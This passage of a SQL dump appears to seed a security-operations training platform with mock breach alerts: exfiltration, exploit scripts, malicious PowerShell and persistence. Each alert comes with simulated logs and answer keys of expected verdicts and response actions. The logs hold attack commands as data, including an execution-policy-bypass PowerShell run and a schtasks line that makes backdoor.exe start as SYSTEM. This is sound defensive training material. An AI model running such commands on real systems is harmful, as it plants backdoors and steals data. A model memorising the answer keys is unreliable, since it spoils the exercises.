x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1048, 'Exfiltration of User Data', 'critical', 'Network traffic analysis', 'Large volumes of data are exfiltrated to an external server, completing the breach and compromising the personal information of millions of users.', 'Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_type\":\"network_traffic\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"5GB\",\"user\":\"jdoe\",\"process_name\":\"data_transfer.exe\",\"sha256_hash\":\"d1c8c9e3f4b8f3a6d7e8a9b0c9e5c4f3e2d1c4b2e3f6d7a8f9b0c1e2d3f4b5c6\",\"file_name\":\"user_data_backup.zip\"}', '2026-01-24 00:10:54', '2026-02-16 17:50:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in data transfer.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known external server associated with data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d1c8c9e3f4b8f3a6d7e8a9b0c9e5c4f3e2d1c4b2e3f6d7a8f9b0c1e2d3f4b5c6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised during exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1049, 'Unusual Traffic Detected on Twitch Servers', 'high', 'Network Traffic Analysis', 'Anomalous traffic patterns from an external IP address were detected on Twitch servers. Analysis indicates potential exploitation of a server misconfiguration by an entity linked to Anonymous (4chan). This activity suggests an attempt to gain unauthorized access.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"10.0.0.25\",\"destination_port\":443,\"protocol\":\"TLS\",\"alert_id\":\"A-2023-0001\",\"user_agent\":\"Mozilla/5.0 (compatible; AnonymousBot/1.0; +http://4chan.org)\",\"url\":\"https://twitch.tv/api/login\",\"http_method\":\"POST\",\"response_code\":200,\"malicious_payload\":{\"filename\":\"exploit_script.js\",\"hash\":\"4d186321c1a7f0f354b297e8914ab240\"}}', '2026-01-24 00:33:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Anonymous operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Twitch server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to exploit server misconfiguration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4d186321c1a7f0f354b297e8914ab240\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known exploit script.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1050, 'Execution of Malicious Scripts', 'critical', 'Endpoint Detection and Response (EDR)', 'Advanced Persistent Threat actors have executed scripts on compromised endpoints to extract sensitive data from Twitch\'s databases. The scripts targeted both source code and financial information.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"185.143.223.21\",\"destination_ip\":\"10.0.0.15\",\"user\":\"j.doe\",\"executed_command\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\j.doe\\\\extract_data.ps1\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"extract_data.ps1\",\"process_id\":4521,\"parent_process_id\":2500,\"detected_by\":\"EDR Agent v3.5\",\"action\":\"Execution\",\"event_description\":\"Suspicious PowerShell script executed to extract sensitive database information.\"}', '2026-01-24 00:33:47', '2026-02-16 17:49:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known data extraction script.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"extract_data.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Script used for unauthorized data extraction.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1051, 'Establishing Persistent Access', 'high', 'Log Monitoring', 'Anonymous (4chan) established persistent backdoors to ensure they could revisit and extract additional data if needed. The attackers used malicious scripts and tools to create unauthorized user accounts and install malware for persistent access.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:10Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"compromised_admin\",\"action\":\"Logon\",\"status\":\"Success\",\"file_created\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\",\"new_user_account\":{\"username\":\"sys_maintenance\",\"privilege\":\"Administrator\"},\"malicious_command\":\"schtasks /create /tn \\\"System Maintenance\\\" /tr \\\"C:\\\\Windows\\\\System32\\\\backdoor.exe\\\" /sc onstart /ru SYSTEM\"}', '2026-01-24 00:33:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a known backdoor malware\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Unusual logon activity detected\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_admin\\\",\\\"action\\\":\\\"Logon\\\",\\\"status\\\":\\\"Success\\\",\\\"file_created\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"3bf0f3b9e7f12b2a4f2354d8e5d3a589\\\",\\\"new_user_account\\\":{\\\"username\\\":\\\"sys_maintenance\\\",\\\"privilege\\\":\\\"Administrator\\\"},\\\"malicious_command\\\":\\\"schtasks /create /tn \\\\\\\"System Maintenance\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\\\\\" /sc onstart /ru SYSTEM\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1052, 'Lateral Movement Across Systems', 'high', 'User Activity Monitoring', 'The attackers moved laterally within Twitch\'s infrastructure to find and access high-value data, increasing the potential impact of the breach.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:23:36Z\",\"event_id\":\"4624\",\"user\":\"jdoe_admin\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.0.0.45\",\"file_transferred\":\"C:\\\\Windows\\\\Temp\\\\APT_tool_v2.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.5\",\"activity\":\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\"}', '2026-01-24 00:33:47', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network log\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network log\",\"verdict\":\"internal\",\"details\":\"Internal destination IP address during lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the APT tool used.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"External attacker IP involved in the breach.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"user activity logs\",\"verdict\":\"suspicious\",\"details\":\"Compromised administrator credentials used in lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.751Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:23:36Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"192.168.1.101\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"file_transferred\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\APT_tool_v2.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.5\\\",\\\"activity\\\":\\\"Lateral movement detected via SMB session from 192.168.1.101 to 10.0.0.45 using compromised credentials.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1053, 'Massive Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) Systems', 'An expert-level threat actor has successfully exfiltrated 125GB of sensitive data, including source code and financial earnings, to an external server. The data was later publicly released, underscoring the seriousness of the breach.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-02T14:45:00Z\",\"event_id\":\"DLP-EXFIL-2023-1002\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"filename\":\"SensitiveDataArchive.zip\",\"file_size\":\"125GB\",\"hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"protocol\":\"HTTPS\",\"action\":\"exfiltrated\",\"external_server_domain\":\"maliciousserver.com\"}', '2026-01-24 00:33:47', '2026-02-16 17:49:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal source IP of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"Hash relates to a file previously flagged in suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"SensitiveDataArchive.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Filename resembles known patterns used in data theft.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"maliciousserver.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Domain used for unauthorized data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:45:00Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-1002\\\",\\\"source_ip\\\":\\\"10.0.0.25\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"SensitiveDataArchive.zip\\\",\\\"file_size\\\":\\\"125GB\\\",\\\"hash\\\":\\\"f2ca1bb6c7e907d06dafe4687e579fce\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"exfiltrated\\\",\\\"external_server_domain\\\":\\\"maliciousserver.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.752Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 